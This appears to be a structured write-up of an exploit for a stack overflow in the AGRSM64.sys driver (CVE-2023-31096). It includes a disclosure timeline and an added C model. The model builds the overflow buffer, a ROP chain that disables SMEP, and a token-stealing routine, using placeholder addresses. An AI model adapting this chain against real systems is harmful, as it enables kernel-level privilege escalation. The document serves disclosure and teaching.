Kernel driver bug-hunting: Exploiting a Stack-Based Buffer Overflow

Vulnerability Details
- title: Kernel driver bug-hunting: Exploiting a Stack-Based Buffer Overflow
- description: The post walks through the exploitation of a stack-based buffer overflow in the AGRSM64.sys driver (CVE-2023-31096), reachable from user mode through an IOCTL handler.
- ioctl_code: 0x1b2150
- cve: CVE-2023-31096
- driver_signature: The driver carries a Microsoft signature, so it loads and is trusted on any Windows version.

Exploitation
- method: The exploit chains three stages:
  - stack_overflow: overflow the stack buffer through the IOCTL to overwrite the saved return address.
  - rop_chain: pivot into a Return-Oriented Programming (ROP) chain that rewrites CR4 (the control register holding the SMEP bit) so that shellcode placed outside the kernel can execute.
  - shellcode: steal the SYSTEM process token and spawn a SYSTEM shell.

Key Code Snippets
- signed_verification:
- exploit_code_64:

Timeline
- reported: 01/24/23 - Vulnerability reported to Broadcom.
- triage: 01/24/23 - Immediate triage response.
- advisory_release: 10/09/23 - Advisory release and blog post.
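The three exploitation stages above, modelled as an added example that is not code from the original post or from the AGRSM64.sys advisory. It builds the overflow buffer (filler up to the saved return address, then a ROP chain that clears CR4.SMEP and returns into shellcode) and walks a fake process list the way a token-stealing payload does. The gadget addresses, the 0x108 return-address offset, the shellcode address, the process-list layout and the PIDs are placeholders chosen for illustration; on a real target the buffer would be sent with DeviceIoControl() using the IOCTL code from the advisory, and the _EPROCESS offsets are version-specific.

```c
/* Added example, not the original post's exploit. Stage 1: filler to the
 * saved return address; stage 2: ROP chain rewriting CR4 to clear SMEP;
 * stage 3: token-stealing walk over a toy process list. All addresses,
 * offsets and PIDs are assumptions for illustration only. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define CR4_SMEP_BIT (1ULL << 20)   /* CR4.SMEP is bit 20 (Intel SDM vol. 3) */

/* ROP gadgets; the addresses are placeholders, not real ntoskrnl offsets */
typedef struct {
    uint64_t pop_rcx_ret;      /* pop rcx ; ret */
    uint64_t mov_cr4_rcx_ret;  /* mov cr4, rcx ; ret */
} gadgets_t;

#define CHAIN_QWORDS 4

/* CR4 with SMEP cleared and every other bit preserved */
uint64_t cr4_without_smep(uint64_t cr4) { return cr4 & ~CR4_SMEP_BIT; }

/* Lay out the overflow: ret_offset bytes of filler up to the saved return
 * address, then the chain. Returns bytes written, or 0 if cap is too small. */
size_t build_payload(uint8_t *out, size_t cap, size_t ret_offset,
                     const gadgets_t *g, uint64_t cr4_now, uint64_t shellcode_va)
{
    size_t need = ret_offset + CHAIN_QWORDS * sizeof(uint64_t);
    if (need > cap) return 0;
    uint64_t chain[CHAIN_QWORDS] = {
        g->pop_rcx_ret,               /* overwritten return address -> pop rcx */
        cr4_without_smep(cr4_now),    /* value popped into rcx: CR4 & ~SMEP   */
        g->mov_cr4_rcx_ret,           /* mov cr4, rcx ; ret                   */
        shellcode_va,                 /* ret -> shellcode, no longer blocked  */
    };
    memset(out, 'A', ret_offset);
    memcpy(out + ret_offset, chain, sizeof chain);
    return need;
}

/* Read back the i-th qword of the chain, to check the layout */
uint64_t payload_qword(const uint8_t *p, size_t ret_offset, size_t i)
{
    uint64_t v;
    memcpy(&v, p + ret_offset + i * sizeof v, sizeof v);
    return v;
}

/* Toy model of the list the token-stealing shellcode walks. A real payload
 * uses version-specific byte offsets inside _EPROCESS instead of fields. */
typedef struct fake_eprocess {
    uint64_t pid;                 /* UniqueProcessId */
    struct fake_eprocess *flink;  /* ActiveProcessLinks.Flink (circular list) */
    uint64_t token;               /* Token */
} fake_eprocess;

#define SYSTEM_PID 4

/* Copy the System process token into cur. Returns the new token, 0 if not found. */
uint64_t steal_token(fake_eprocess *cur)
{
    fake_eprocess *p = cur;
    do {
        if (p->pid == SYSTEM_PID) { cur->token = p->token; return cur->token; }
        p = p->flink;
    } while (p != cur);
    return 0;
}

int main(void)
{
    gadgets_t g = { 0xfffff80012345678ULL, 0xfffff8001234abcdULL }; /* placeholders */
    uint8_t buf[512];
    size_t n = build_payload(buf, sizeof buf, 0x108, &g, 0x370678ULL, 0x10000000ULL);
    printf("payload %zu bytes, rcx=0x%llx\n", n,
           (unsigned long long)payload_qword(buf, 0x108, 1));

    fake_eprocess sys = { SYSTEM_PID, NULL, 0xffff9a8000001234ULL };
    fake_eprocess me  = { 1337, &sys, 0xffff9a8000009999ULL };
    sys.flink = &me;
    printf("token after steal: 0x%llx\n", (unsigned long long)steal_token(&me));
    return 0;
}
```

The chain is the minimal form of the CR4 technique: one gadget to load rcx, one to move it into CR4, then a return into the shellcode. Clearing only bit 20 keeps the rest of CR4 intact, which matters because writing an invalid CR4 value faults immediately in ring 0; the fault would not be recoverable from an IOCTL handler.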